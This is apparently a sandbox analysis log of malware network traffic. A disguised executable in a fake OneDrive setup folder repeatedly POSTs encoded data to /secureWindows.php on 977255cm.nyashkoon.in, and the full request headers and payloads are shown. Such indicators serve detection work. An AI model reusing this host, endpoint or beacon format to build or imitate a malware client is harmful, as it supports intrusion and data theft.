                                                        Oct 30, 2024 05:23:20.718799114 CET | 286 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:21.073975086 CET | 1076 | OUT | Data Raw: 57 55 5c 55 55 5a 56 56 58 57 50 59 55 5e 5b 5c 54 58 5c 54 59 51 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WU\UUZVVXWPYU^[\TX\TYQZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&, <(&Y'>#A.4]&>';98]"*$'))5505.: F$,Z*=
                                                        Oct 30, 2024 05:23:21.314237118 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:21.508055925 CET | 784 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wfgWhasNf6UzjGRHhhN0CIiau2E%2BljpRv4uolIBO5NSpUFRA2jEBilCLC7aUQIdrqOIgmPc8YiU0gXqOsVyGCmVP3rY0CdPYKarI%2FUvrYVcegeNR5dyMxu2ZviWqUxks4bDW8diNqck%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a125db364769-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1107&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1273526&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        86 | 192.168.2.4 | 49950 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:21.641458035 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:21.997354031 CET | 1076 | OUT | Data Raw: 57 54 59 51 55 59 53 55 58 57 50 59 55 59 5b 52 54 5e 5c 5d 59 55 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WTYQUYSUXWPYUY[RT^\]YUZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&;V2^+;1%.$-?&<_;;":8')3_?%:'%X. F$,Z*!
                                                        Oct 30, 2024 05:23:22.244126081 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:22.604337931 CET | 785 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5E8d%2B3Gv9g3RIWTf%2BYLyRkpCJ51hsYCxnYWFzoBnzLHhpqFUVkmPJLlyq1ajkp5O57spXONpNTI%2BbTOYZj4lFz2WQMrLJ%2Fm7dzu8lw9PH1elst54%2FwldEe0StT18gQYXyjYCrkNxKvM%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a12baa1fead1-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1361&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1109578&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:23:22.604512930 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        87 | 192.168.2.4 | 49959 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:22.774600029 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:23.120866060 CET | 1076 | OUT | Data Raw: 52 54 5c 52 55 5d 53 56 58 57 50 59 55 59 5b 53 54 5e 5c 5b 59 50 5a 55 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RT\RU]SVXWPYUY[ST^\[YPZU]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%;02Y+;.Y3>;D90$--9(X#: 1_#^(%6$69: F$,Z*!
                                                        Oct 30, 2024 05:23:23.369278908 CET | 25 | IN | HTTP/1.1 100 Continue


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        88 | 192.168.2.4 | 49963 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:23.487828016 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:23.839660883 CET | 1340 | OUT | Data Raw: 57 5e 5c 53 50 5f 56 54 58 57 50 59 55 50 5b 5d 54 59 5c 5b 59 5c 5a 58 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^\SP_VTXWPYUP[]TY\[Y\ZX]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%, :]<[3#-C,$=0[/:$#: 1(<%^38%-: F$,Z*
                                                        Oct 30, 2024 05:23:24.094664097 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:24.408994913 CET | 940 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=niKDgvD%2F%2B%2FpnW0AJV3eqcwpG2e0dsyTh%2BjaCSrjGLKDP7ZFS76Smcr3VjHUoSKd%2BtliAb0WwS3ErG%2BzLIEQTn3jgkPctBz8aKw6uzfdDmgpSXw2o3fRqtvr6cy3foFIFZqedDBXMQY8%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a137388e46ce-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1542&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=938431&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 1d 3c 01 23 08 31 23 04 13 3c 2c 26 00 29 3d 3a 14 30 31 24 5e 26 12 39 00 28 28 37 10 2a 34 2c 5a 3f 0b 3b 00 34 26 0e 5b 3e 3b 2f 46 0c 10 27 5f 24 54 33 56 28 0d 3d 5c 29 28 3b 17 34 30 25 01 3d 00 2b 51 20 23 2b 01 33 0f 35 0d 2c 03 22 52 3a 35 32 12 2d 30 30 53 3e 3a 21 57 08 14 22 1f 24 3f 3c 05 32 3d 2f 04 25 54 22 13 34 01 0d 1f 36 38 2e 58 2b 05 28 56 32 20 2b 06 30 30 28 0f 26 29 27 07 2b 32 3c 0d 27 23 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&<#1#<,&)=:01$^&9((7*4,Z?;4&[>;/F'_$T3V(=\)(;40%=+Q #+35,"R:52-00S>:!W"$?<2=/%T"468.X+(V2 +00(&)'+2<'#"R. V2XS0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        89 | 192.168.2.4 | 49965 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:23.608897924 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:23.964682102 CET | 1076 | OUT | Data Raw: 52 50 5c 55 55 54 56 5d 58 57 50 59 55 51 5b 53 54 59 5c 5f 59 56 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RP\UUTV]XWPYUQ[STY\_YVZ^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%;&+:[''.5Z&[#-* *+\%X(5&3!_9 F$,Z*
                                                        Oct 30, 2024 05:23:24.228070974 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:24.421516895 CET | 778 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qEqyUBV%2Bre7Ui5iWZoJDz9g8lQeNm%2FcezfkkOc8jVtIvK7RA32VLCGKAxc4ibkt5hcEtCyUKVRLoP8Lxmoph8uLYtVu5lqLKgeefqE6pLjv1OPFTO0E2oTjESrV90PgzpgDw6PNm4RI%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1381c682e24-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2130&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=681091&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:23:24.421561003 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        90 | 192.168.2.4 | 49970 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:24.546519995 CET | 286 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:24.902158022 CET | 1076 | OUT | Data Raw: 52 53 5c 57 55 5f 56 5c 58 57 50 59 55 5a 5b 5e 54 5d 5c 5f 59 5c 5a 5c 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RS\WU_V\XWPYUZ[^T]\_Y\Z\]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%Z;0-?+.Z'.;-C4_1.3/*8\#&_?X+>08--* F$,Z*-
                                                        Oct 30, 2024 05:23:25.142275095 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:25.343456984 CET | 788 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ORsgEKu8BAQc6KznRTB0Vy%2B0YbOG9xYt6%2BYV%2FZEro81%2BqFiEJqlrDtv3bkaSk6eMRjOyZz3G50AF4ceVFHXxBorbhH3MkUFwdrjvjMTtshkVWd7UBOmCqVB7ikWnkmPABfzJkWPgvUQ%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a13dcfa86c74-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1233&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1213746&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        91 | 192.168.2.4 | 49976 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:25.486816883 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:25.839690924 CET | 1076 | OUT | Data Raw: 57 54 5c 53 50 5d 56 57 58 57 50 59 55 5c 5b 5d 54 5a 5c 5c 59 50 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WT\SP]VWXWPYU\[]TZ\\YPZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%8<"0-;:/&.<8*Z797&)4<9Z'5Y/: F$,Z*5
                                                        Oct 30, 2024 05:23:26.091653109 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:26.285461903 CET | 787 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hui3hlBO3E7mWFQXxN4pmvz7LX50eX4j5Cwu2snjPQ7Exig4fTcq5%2FuZ6zIOa154WDi51UXW49Gy69KRe%2BrL2lg%2BmxBun6QSopKjiCPILtmcxwf0j027YXs%2Fv1m6Bf2tV0qAYxzbyZI%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a143be6fe983-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2062&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=701890&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        92 | 192.168.2.4 | 49983 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:26.405018091 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:26.761555910 CET | 1076 | OUT | Data Raw: 57 56 59 57 55 5d 53 51 58 57 50 59 55 5a 5b 5e 54 5f 5c 58 59 51 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WVYWU]SQXWPYUZ[^T_\XYQZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^;*Y?07E954_%-8)7##[%]?%'^5[- F$,Z*-
                                                        Oct 30, 2024 05:23:27.002424002 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:27.328603029 CET | 789 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:27 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MolGBu%2FTTWSoPGWx4Q1WiRMVR0ngkQ7zN0KFjtpa5PnQ7q0HWBLcxXbpHBIwmfADMuRIcIqFaMQCZh9vIj6YWesXHX6e1sAv0V1xak89%2F%2Fwk6hrae7k5%2B4ZFHw2beTDzvmRxk%2FIbTRo%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1496a9b2cab-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2154&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=671614&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        93 | 192.168.2.4 | 49990 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:27.461026907 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:27.808382988 CET | 1076 | OUT | Data Raw: 57 53 5c 56 55 5d 53 50 58 57 50 59 55 50 5b 5c 54 5f 5c 5b 59 52 5a 55 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WS\VU]SPXWPYUP[\T_\[YRZU]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%/>=813 96<Z% ,(]#*X%3(C9]'(=Z. F$,Z*
                                                        Oct 30, 2024 05:23:28.067584038 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:28.265152931 CET | 782 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eaGlRRNEUwLatk5sQxJefLxf6Nm8E5g9NlYzFPlp8d4kLb2WRqnTtnAjsficVQjSfYnvewZ2QeBmG7JdPG9zZM4wFWLzsjUNeO9qy1iFWjcCdP9YaNyl1CJa9eBie99QTZ%2BtXcqPQ5M%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1500ed54871-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1177&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1221940&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        94 | 192.168.2.4 | 49996 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:28.391906977 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:28.745898008 CET | 1076 | OUT | Data Raw: 57 50 59 51 55 58 56 53 58 57 50 59 55 5b 5b 59 54 5a 5c 5d 59 56 5a 58 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WPYQUXVSXWPYU[[YTZ\]YVZX]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%[-3&(0>#-5<$-;;/#*;Y24?%]3*9 F$,Z*)
                                                        Oct 30, 2024 05:23:29.012952089 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:29.218380928 CET | 794 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MwgRFYoa%2BuTVhAEvUSFTzHc6Q%2Bt4gGKIXGeiUQSCQGMid%2FN1XCc7lx%2BX5G8WTEJzWx10Xzall9v%2FkdApLRdJATx1bIz6V8D6ex39xuN8REygY%2FMlQyTT%2Fl0F3s1qnXltVk2ZNIuieWI%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
